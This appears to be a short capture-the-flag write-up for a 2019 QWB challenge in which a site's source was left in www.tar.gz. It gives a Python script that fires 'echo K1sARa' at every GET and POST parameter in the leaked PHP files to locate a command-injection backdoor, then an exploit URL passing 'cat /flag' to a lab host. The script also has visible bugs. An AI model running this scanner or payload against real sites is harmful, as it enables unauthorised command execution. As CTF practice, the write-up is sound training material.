强网杯 2019

我也是很佩服你们公司的开发，特地备份了网站源码到www.tar.gz以供大家观赏

import re
import os
import requests

src_path = '../../phpstudy_pro/WWW/localhost/src'
file_list = os.listdir(src_path)

for file in file_list:
    f = open(src_path + '/' + file)
    GET_Array = re.findall('\$_GET\[\'(.*?)\'\]', f.read())
    POST_Array = re.findall('\$_POST\[\'(.*?)\'\]', f.read())

    f.close()
    for param in GET_Array:
        url = 'http://127.0.0.1/src/' + file
        res = requests.get(url, {
            param: 'echo K1sARa'
        })
        if 'K1sARa' in res.text:
            print(file, param, 'YES')
            exit(1)
        else:
            print(file, param, 'NO')

    for param in GET_Array:
        url = 'http://127.0.0.1/src/' + file
        res = requests.post(url, data={
            param: 'echo K1sARa'
        })
        if 'K1sARa' in res.text:
            print(file, param, 'YES')
            exit(1)
        else:
            print(file, param, 'NO')

http://c6a46daa-1ec6-4adc-ac66-258cd27b688c.node4.buuoj.cn:81/xk0SzyKwfzw.php?Efa5BVG=cat /flag